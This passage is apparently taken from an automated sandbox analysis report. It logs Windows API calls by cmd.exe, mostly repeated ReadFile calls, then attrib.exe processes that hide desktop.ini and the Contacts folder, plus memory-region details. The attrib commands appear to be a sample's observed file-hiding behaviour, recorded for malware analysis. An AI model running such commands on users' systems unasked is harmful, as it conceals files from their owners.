lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.286] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.287] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.288] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.289] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.289] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.289] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.289] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.369] FindClose (in: hFindFile=0x20e5e8 | out: hFindFile=0x20e5e8) returned 1 [0218.369] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0218.370] _close (_FileHandle=3) returned 0 [0218.370] GetConsoleTitleW (in: lpConsoleTitle=0x16f550, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.370] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0218.370] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.370] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.370] FindClose (in: hFindFile=0x20e5e8 | out: hFindFile=0x20e5e8) returned 1 [0218.371] FindClose (in: hFindFile=0x20e5e8 | out: hFindFile=0x20e5e8) returned 1 [0218.371] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0218.371] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0218.371] GetConsoleTitleW (in: lpConsoleTitle=0x16f2e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.371] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f16c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f234 | out: lpAttributeList=0x16f16c, lpSize=0x16f234) returned 1 [0218.371] UpdateProcThreadAttribute (in: lpAttributeList=0x16f16c, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f22c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f16c, lpPreviousValue=0x0) returned 1 [0218.371] GetStartupInfoW (in: lpStartupInfo=0x16f128 | out: lpStartupInfo=0x16f128*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0218.371] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0218.371] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x16f1c8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f214 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" ", lpProcessInformation=0x16f214*(hProcess=0x4c, hThread=0x50, dwProcessId=0x62c, dwThreadId=0xca0)) returned 1 [0218.373] CloseHandle (hObject=0x50) returned 1 [0218.373] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0218.373] GetEnvironmentStringsW () returned 0x212c70* [0218.373] FreeEnvironmentStringsW (penv=0x212c70) returned 1 [0218.373] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0218.416] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x16f108 | out: lpExitCode=0x16f108*=0x0) returned 1 [0218.416] CloseHandle (hObject=0x4c) returned 1 [0218.416] _vsnwprintf (in: _Buffer=0x16f250, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f114 | out: _Buffer="00000000") returned 8 [0218.416] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0218.416] GetEnvironmentStringsW () returned 0x212c70* [0218.416] FreeEnvironmentStringsW (penv=0x212c70) returned 1 [0218.416] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0218.416] GetEnvironmentStringsW () returned 0x212c70* [0218.416] FreeEnvironmentStringsW (penv=0x212c70) returned 1 [0218.416] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f16c | out: lpAttributeList=0x16f16c) [0218.416] GetConsoleTitleW (in: lpConsoleTitle=0x16f550, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.417] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0218.417] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.417] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.417] FindClose (in: hFindFile=0x20e5e8 | out: hFindFile=0x20e5e8) returned 1 [0218.417] FindClose (in: hFindFile=0x20e5e8 | out: hFindFile=0x20e5e8) returned 1 [0218.417] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0218.417] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0218.417] GetConsoleTitleW (in: lpConsoleTitle=0x16f2e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.417] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f16c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f234 | out: lpAttributeList=0x16f16c, lpSize=0x16f234) returned 1 [0218.417] UpdateProcThreadAttribute (in: lpAttributeList=0x16f16c, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f22c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f16c, lpPreviousValue=0x0) returned 1 [0218.417] GetStartupInfoW (in: lpStartupInfo=0x16f128 | out: lpStartupInfo=0x16f128*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0218.418] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0218.418] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x16f1c8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f214 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"", lpProcessInformation=0x16f214*(hProcess=0x50, hThread=0x4c, dwProcessId=0xfd0, dwThreadId=0xe70)) returned 1 [0218.419] CloseHandle (hObject=0x4c) returned 1 [0218.419] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0218.419] GetEnvironmentStringsW () returned 0x213628* [0218.420] FreeEnvironmentStringsW (penv=0x213628) returned 1 [0218.420] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0218.476] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x16f108 | out: lpExitCode=0x16f108*=0x0) returned 1 [0218.477] CloseHandle (hObject=0x50) returned 1 [0218.477] _vsnwprintf (in: _Buffer=0x16f250, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f114 | out: _Buffer="00000000") returned 8 [0218.477] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0218.477] GetEnvironmentStringsW () returned 0x213628* [0218.477] FreeEnvironmentStringsW (penv=0x213628) returned 1 [0218.477] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0218.477] GetEnvironmentStringsW () returned 0x213628* [0218.477] FreeEnvironmentStringsW (penv=0x213628) returned 1 [0218.477] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f16c | out: lpAttributeList=0x16f16c) [0218.477] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.477] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.477] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.477] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0218.477] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.477] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0218.477] SetConsoleInputExeNameW () returned 0x1 [0218.477] GetConsoleOutputCP () returned 0x1b5 [0218.478] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0218.478] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.478] exit (_Code=0) Process: id = "562" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16840" os_pid = "0xa20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "561" os_parent_pid = "0xe3c" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32616 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32617 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32618 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32619 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 32620 start_va = 0x820000 end_va = 0x826fff entry_point = 0x820000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32621 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32622 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32623 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32624 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 32625 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32626 start_va = 0x10000 end_va = 0x1ffff 